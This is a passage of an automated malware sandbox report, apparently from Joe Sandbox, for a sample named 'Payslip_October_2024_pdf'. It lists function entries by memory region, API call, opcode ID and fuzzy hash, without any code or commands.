                                              • Instruction Fuzzy Hash: 9C41F272D0035A9FCB04DFA9D8147EEBBF5BF88310F1585AAE408A7241DB789885CBD1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000), ref: 010980B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID: c!
                                              • API String ID: 4033686569-2715345226
                                              • Opcode ID: 96ec879ffb5ec30c334e6b14c30632ccc13e7e48a000c82ef862389fc5458b48
                                              • Instruction ID: f02b11bfd78b0c72886a4310f8346717c014cb5d917d9944be037d6196d236f4
                                              • Opcode Fuzzy Hash: 96ec879ffb5ec30c334e6b14c30632ccc13e7e48a000c82ef862389fc5458b48
                                              • Instruction Fuzzy Hash: 782124B5C006198BCB24CFAAD544B9EFBF0BF48720F14855AE858B7350D379AA44CFA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000), ref: 010980B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID: c!
                                              • API String ID: 4033686569-2715345226
                                              • Opcode ID: 427cb7a32c18d3c1961293bfb830ef23adfcc06b9725a02d1de1eed6ef22ed19
                                              • Instruction ID: 8009d916269e7aca438a7df274863f95c6bf00a65c179abc6e4c669577d576ea
                                              • Opcode Fuzzy Hash: 427cb7a32c18d3c1961293bfb830ef23adfcc06b9725a02d1de1eed6ef22ed19
                                              • Instruction Fuzzy Hash: CE1124B1C006199BCB14CF9AC54469EFBF4BF48320F10816AD958A7340D778A940CFE1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0109EFDF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: c!
                                              • API String ID: 1890195054-2715345226
                                              • Opcode ID: b514fc1ad3a015d29afaecdc255362c6eb0deec7cbbec29a8f9743daafa1e4dc
                                              • Instruction ID: 4ef63f8e0e35469947d7912e34ab831b499b6071b9bac3df05343106e5de246b
                                              • Opcode Fuzzy Hash: b514fc1ad3a015d29afaecdc255362c6eb0deec7cbbec29a8f9743daafa1e4dc
                                              • Instruction Fuzzy Hash: 7E11EFB1C0065A9BCB10DF9AC944B9EFBF4AF48320F14856AE918A7240D778A944CFE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: d96271443cfebfe76855bd0bc7bab2f4154239da3d774d8c846cddcbb12ce850
                                              • Instruction ID: f5fc6a33b2fdc844c2fe9969add0fe98e64bc880a1b203c906d296b5a5c7d478
                                              • Opcode Fuzzy Hash: d96271443cfebfe76855bd0bc7bab2f4154239da3d774d8c846cddcbb12ce850
                                              • Instruction Fuzzy Hash: C2516071B001099FDF64EB79D860BAEB7F6BBD9214F108569C419DB388EF309C068B91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq
                                              • API String ID: 0-2292610095
                                              • Opcode ID: 9ae0c97ad9bb3ee8da0adbf83fae5ecf7b6f98447a412afcc26c4b5f254b0bcb
                                              • Instruction ID: 15d82fa2d3c5138f00505c687b84d34351a230838c10edb0543f40a8da931116
                                              • Opcode Fuzzy Hash: 9ae0c97ad9bb3ee8da0adbf83fae5ecf7b6f98447a412afcc26c4b5f254b0bcb
                                              • Instruction Fuzzy Hash: 0E515E71F002099FDB54EFA4C4557AEBBF6FF88710F208529E105AB399DA758C018B91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 7e756e535c9e181e6beba00951e682accb50efe8066d67cce60fe94ac4eba49c
                                              • Instruction ID: b034c19a01bb98d5b48eb9dcc4bca8607303f537bcc306083c2652fa85612780
                                              • Opcode Fuzzy Hash: 7e756e535c9e181e6beba00951e682accb50efe8066d67cce60fe94ac4eba49c
                                              • Instruction Fuzzy Hash: 2441AF70E0020E9FDB65EFA5C4946AEBBB6AF85300F10852AE501EB344EB75D946CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: afc5a3e84f86beb0292e1c8f617e1baf0431252fd54359f9acd0648f0ce7f151
                                              • Instruction ID: 3167984d5ba6ca07f3d465f6ea6c62ee10147eda4735cf8847a7f35e65320b0e
                                              • Opcode Fuzzy Hash: afc5a3e84f86beb0292e1c8f617e1baf0431252fd54359f9acd0648f0ce7f151
                                              • Instruction Fuzzy Hash: C7314230B142058FDB59AB74C5647AEBBE7AF89210F104578E406DB389DF39CE02CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 84083353011fa92b7e11605005892e4575a2846f74c40703855c63e22924c419
                                              • Instruction ID: 4982ccb3f31e112f61c0bf50362c6f576c7a0065eaa8684838ef485cb5d43d0b
                                              • Opcode Fuzzy Hash: 84083353011fa92b7e11605005892e4575a2846f74c40703855c63e22924c419
                                              • Instruction Fuzzy Hash: AC312430B142098FDB58AB74C52066EBBE7AF89210F104538E406DB398DF39DE01CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: c!
                                              • API String ID: 0-2715345226
                                              • Opcode ID: 1e7df2b8ee61e6ec94ba939d963733964cfe72289ee34286fa735d30f683219e
                                              • Instruction ID: 3f1b937a795b15687b46f1ae342f90c70f4fd0351b18959da30abcd59cdeef27
                                              • Opcode Fuzzy Hash: 1e7df2b8ee61e6ec94ba939d963733964cfe72289ee34286fa735d30f683219e
                                              • Instruction Fuzzy Hash: AA21C2B5D01219AFCB00DF9AD884ADEFBF4FB48310F10852AE918A7200C378A954CFE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: c!
                                              • API String ID: 0-2715345226
                                              • Opcode ID: cc5ab886158a27d7e230029a536c295ac347ad307505bd4d95ecf54ea1fac336
                                              • Instruction ID: 4c72592f156974f2882329e6c72139d3b5451266ed5fe72a3be67344061f4324
                                              • Opcode Fuzzy Hash: cc5ab886158a27d7e230029a536c295ac347ad307505bd4d95ecf54ea1fac336
                                              • Instruction Fuzzy Hash: 6A11B3B5D012599FCB00DF9AD984ADEFBF4FB49310F10852AE918A7240C3786954CFE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q
                                              • API String ID: 0-1007455737
                                              • Opcode ID: c1808e497fcfa51c5ea1839c57130d4071ab60fc974bf962016262e88b67df14
                                              • Instruction ID: 10d8d403718eb99b4d7dbc65c438c322d3468f69dd5a6f9015f302881fab341e
                                              • Opcode Fuzzy Hash: c1808e497fcfa51c5ea1839c57130d4071ab60fc974bf962016262e88b67df14
                                              • Instruction Fuzzy Hash: 06F046B2B0011D8FDF78BE99E9806ACB7ACFB403A4F148425CA05CB204D735ED0AC781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Obq
                                              • API String ID: 0-2878401908
                                              • Opcode ID: 1d3a02a9ad5e4a3a335ee8f77f0c814f7b1830ef29f9df677abc119e3850264f
                                              • Instruction ID: 2b3487be1479b9ec4c9d19a832f8fabb400d94c125552e1d666ba4b43142c304
                                              • Opcode Fuzzy Hash: 1d3a02a9ad5e4a3a335ee8f77f0c814f7b1830ef29f9df677abc119e3850264f
                                              • Instruction Fuzzy Hash: 52F0DA30A5022DDBDB14DF94E899BAEBBB6FF88705F204519E402A7394CBB41C01CB80
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da3a20fd327c29adddf6e21a43cc16ffbdc78800a43e8c2c08f1e185e38eb027
                                              • Instruction ID: e851e64ab5e94d4b9f2ee6a00bd32ed7dc8df411f1b1d2a5fd5c525f64c97234
                                              • Opcode Fuzzy Hash: da3a20fd327c29adddf6e21a43cc16ffbdc78800a43e8c2c08f1e185e38eb027
                                              • Instruction Fuzzy Hash: 2951A970B202199FEFA4A66CD95476F265EDBC9314F20482DE60AD73D9CA3CCC458792
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed136014d922ef80281ff6b320d79a3f769cc41dba1964ef885f1bf263151a8d
                                              • Instruction ID: 158ebc1d73999d8bf1e3151b85f04dee947157b347562a0ea1303bd5a5bd662a
                                              • Opcode Fuzzy Hash: ed136014d922ef80281ff6b320d79a3f769cc41dba1964ef885f1bf263151a8d
                                              • Instruction Fuzzy Hash: 82519770B202189FEFA4B66CD95472F265EDBC9354F20482DEA0AD73D9CA3CCC458396
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1179a8ec032bc03dabd4609b996fcb53c98e9016738614df8fbf84112540e22
                                              • Instruction ID: 182317f0d4bedee92cbc5979b5c6e573ebf2e652d61e724f233ebeaafcad1bcd
                                              • Opcode Fuzzy Hash: b1179a8ec032bc03dabd4609b996fcb53c98e9016738614df8fbf84112540e22
                                              • Instruction Fuzzy Hash: 6C416F71E002099FDF60DEA9D880ABFF7B2FB84310F10492AE256D7650D735E855CB92
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46e1b388035cac970610e9ed9d31afd707ce9b390b749c922946bf2c2fab56d4
                                              • Instruction ID: c1484170b54fcce9847858667bb042d533e226f30489777669ac0bf837e7e307
                                              • Opcode Fuzzy Hash: 46e1b388035cac970610e9ed9d31afd707ce9b390b749c922946bf2c2fab56d4
                                              • Instruction Fuzzy Hash: 0E31C730E1020A8BCF14EFA5D980A9EBBB5FF85300F148929E505EB344EB74E946CB81
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8f5d6b5ac5cb37eba1cfbe41e07f93603048f8995e557d1b497d56450614d89
                                              • Instruction ID: 3b30707370e6412bb300b54bbe0665484871c76c5979d8efaf131f39e2c23f60
                                              • Opcode Fuzzy Hash: e8f5d6b5ac5cb37eba1cfbe41e07f93603048f8995e557d1b497d56450614d89
                                              • Instruction Fuzzy Hash: DA319034E1424ADBDB05EFA4D8646AEBBF2BF89300F10C519E906EB350DB75AD46CB40
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c177482ade0ceeaa94a3b36e99adcb4034ef0e33462660ddd9481418f3a162b
                                              • Instruction ID: ce49303de4ddac17a71a1845d815e76ba3a276e27236655aa96855d32a344c86
                                              • Opcode Fuzzy Hash: 3c177482ade0ceeaa94a3b36e99adcb4034ef0e33462660ddd9481418f3a162b
                                              • Instruction Fuzzy Hash: 30318030E142099BCB09EF65D86469EB7F6BF89310F108529F906EB350DB71AD42CB50
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43f97077cda7198efdd549049b681e681f530731a568d2b083cffadc6868faf8
                                              • Instruction ID: c6af48b5d3739a315d6d0658d6d3c33dcd98672883bcfb3b6795464393411cab
                                              • Opcode Fuzzy Hash: 43f97077cda7198efdd549049b681e681f530731a568d2b083cffadc6868faf8
                                              • Instruction Fuzzy Hash: F521AE76F002099FDB50EFA9D891BAEBBF5EB58710F148025EA09E7390E735D811CB91
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81ee82bc86d3b0897d8bcba59c33c6df139aeffd7c517eab79104a7cf05623a1
                                              • Instruction ID: b3e162f8941c0407b018d93b8106ef3bee33aa41b15250a50b95a3fd78bbd07d
                                              • Opcode Fuzzy Hash: 81ee82bc86d3b0897d8bcba59c33c6df139aeffd7c517eab79104a7cf05623a1
                                              • Instruction Fuzzy Hash: D6217C75F002199FDB50EF69D881AAEBBF5EB58310F148025E905E7340E735D911CB91
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 396e67beb5efa118865c411d8f8759001275595f3a8249d31a11af0ee9169bd5
                                              • Instruction ID: ac06de511555d7a01be50985082e59a1216fc9ed7376dbbaa1c454305c53ce2a
                                              • Opcode Fuzzy Hash: 396e67beb5efa118865c411d8f8759001275595f3a8249d31a11af0ee9169bd5
                                              • Instruction Fuzzy Hash: 82217F71D1071E8BCF64DFA9C44069EBBB5FF85310F10892AE905EB240DB70E945CB81
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cad6d0337c543d9b2ae305b9d390ae7f1bd8ad7a3db160b95961194c33bdab63
                                              • Instruction ID: aa1425feb38fb1add0eb5380bf69db521122bf3f29d360e5d07467c47edf97df
                                              • Opcode Fuzzy Hash: cad6d0337c543d9b2ae305b9d390ae7f1bd8ad7a3db160b95961194c33bdab63
                                              • Instruction Fuzzy Hash: 5821F271504204DFDB15DF98D9C0F26BBA5FB88314F24C5AEE9894B266C33ED846CB62
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e22432d842d7e0c2668be4c570ea1e50caf36ab433832f0fc385a15406aa5acf
                                              • Instruction ID: 23e7f6a137153f5fefeca91857beb41f062ced9aeab6b567f75ede5d40d7a60a
                                              • Opcode Fuzzy Hash: e22432d842d7e0c2668be4c570ea1e50caf36ab433832f0fc385a15406aa5acf
                                              • Instruction Fuzzy Hash: EE2137B1500204DFDB05DF68D5C0B26BBA5FB84314F20C5ADD9894B256C73AE806CB61
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9591fdde21002fd4bd5fd91ccd45b077d023886192e44dde0041524eb5f7fe2c
                                              • Instruction ID: 9a055a13a8725831b2531cb1dc1956494a7b2eb5fc9d0e3d4983781ac127a5fa
                                              • Opcode Fuzzy Hash: 9591fdde21002fd4bd5fd91ccd45b077d023886192e44dde0041524eb5f7fe2c
                                              • Instruction Fuzzy Hash: 51212971504204DFDB15DF98D584B2ABBA5FB95324F20C569D8890B246C37AD80ACBA1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7672517989cd64fb362f62480d08f70092dd5d5d863f8ec8de510c9e235b9b8c
                                              • Instruction ID: 5f0731f156fa872876564d2c69280c9b44e8c8c4915cd1c52547212bc87165ee
                                              • Opcode Fuzzy Hash: 7672517989cd64fb362f62480d08f70092dd5d5d863f8ec8de510c9e235b9b8c
                                              • Instruction Fuzzy Hash: 3C21F271644244EFDB05DF58C9C0B26BFA5FB84318F30C5ADD9894B696C33AD846C761
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04a41912e42464ac8236ee8b61a3604bfd1cf4ed9a48124c479ac657b41e0af7
                                              • Instruction ID: a4915127e6899f8fd242863142fa57aba5f928a3f2edc3a15beba92e3ff8c928
                                              • Opcode Fuzzy Hash: 04a41912e42464ac8236ee8b61a3604bfd1cf4ed9a48124c479ac657b41e0af7
                                              • Instruction Fuzzy Hash: FD11A132B101299BDF94E678CC546AE73EAEBD8315F048139D50AE7344DE75DC128BD1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 052d2fccabfded746723514ce05d600cab5d293aabad0ca8ac826200719c7202
                                              • Instruction ID: 3cafd6deb3c8e4ef1c4c853cfbb5943b1f0625adfca8f372ac39ca5f04a9ceed
                                              • Opcode Fuzzy Hash: 052d2fccabfded746723514ce05d600cab5d293aabad0ca8ac826200719c7202
                                              • Instruction Fuzzy Hash: 9E01D432B100150BDB54A5ADE410B5FB7DAEBC5B24F248439F20EC7351EE65DC034385
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d7394f3d16813079e45fe29a31e2d410aeb0692367dee8fa0b84774a49a1c92
                                              • Instruction ID: 07ffaa55e0ea62517df23efd8ddf9254ee5c25af6f1f91198bc0bd97b0bb4766
                                              • Opcode Fuzzy Hash: 7d7394f3d16813079e45fe29a31e2d410aeb0692367dee8fa0b84774a49a1c92
                                              • Instruction Fuzzy Hash: F801D431B105150FCB69E67D945476FB7D6EBCA221F24847EE20AC7340DA14DD438782
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: a358d6653469a10bf5aee565f4246eee7a70c529575fe75b3feecbc41bbc3659
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: 7911BB75504280CFDB02CF54D5C4B15BFA2FB84314F24C6AAD9894B2A6C33AE84ACB62
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              • Instruction ID: d434c0eb2c1d146574841899ef5fc603f35398e602a4dac93ce129322786cc23
                                              • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              • Instruction Fuzzy Hash: 1811C176504280CFDB12CF54D5C4B19FFB1FB95324F24C6AAD8894B656C33AD80ACBA2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: d805432ba919086e31828c93343ee608e30e86d992f2a1e9377779e14a661368
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: 9A11BE75504280DFDB12CF54D5C4B15BFA2FB84314F24C6AAE9894B666C33AD84ACB62
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                              • Instruction ID: 8a0162d9836d5e8a5028f25d443587f7b3e137fcd446254f24cd8fdadf14fb94
                                              • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                              • Instruction Fuzzy Hash: 5711BB75504280DFDB06CF14C9C4B15BFA2FB84218F24C6AAD8894BA92C33AD84ACB52
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6740f1b02c209fe2f40f96b7855df88c35ea1f620d68caf022d31632fa3fa968
                                              • Instruction ID: 2bddf3da35512085755d8bbe80051a0c862044e72b7cbb310a683e76edb11184
                                              • Opcode Fuzzy Hash: 6740f1b02c209fe2f40f96b7855df88c35ea1f620d68caf022d31632fa3fa968
                                              • Instruction Fuzzy Hash: 07018131B101150BDB65A9BDE454B6FB7DAEBC9B24F20843AF20ECB354DE66DC024391
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0711fa19850584a4e3869f2aedf177e8cb9f1103b3f5557450ed68c628584120
                                              • Instruction ID: 6eacd2d004387e49f75b21b8a7301f45d542cfdd765cd5715c81eadbd50cbed5
                                              • Opcode Fuzzy Hash: 0711fa19850584a4e3869f2aedf177e8cb9f1103b3f5557450ed68c628584120
                                              • Instruction Fuzzy Hash: B3018F36F100294BEBA5A568DC553EE72EADBD8215F048036D50AE7384EA65CC1647D1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55ab0ea94396250d9ecd6f0a9ea9a3c6e45eeef6537dbe2bb36aa012553e30d6
                                              • Instruction ID: 4d96aabb792a30aff163ba6d11850fa9e586f9f2cf645d3bc6ae52cb28b982f5
                                              • Opcode Fuzzy Hash: 55ab0ea94396250d9ecd6f0a9ea9a3c6e45eeef6537dbe2bb36aa012553e30d6
                                              • Instruction Fuzzy Hash: 5B012432B100084BDBA9E67DD46532E67C5EB89264F108424E20ECB398EF22DC028381
                                              Memory Dump Source
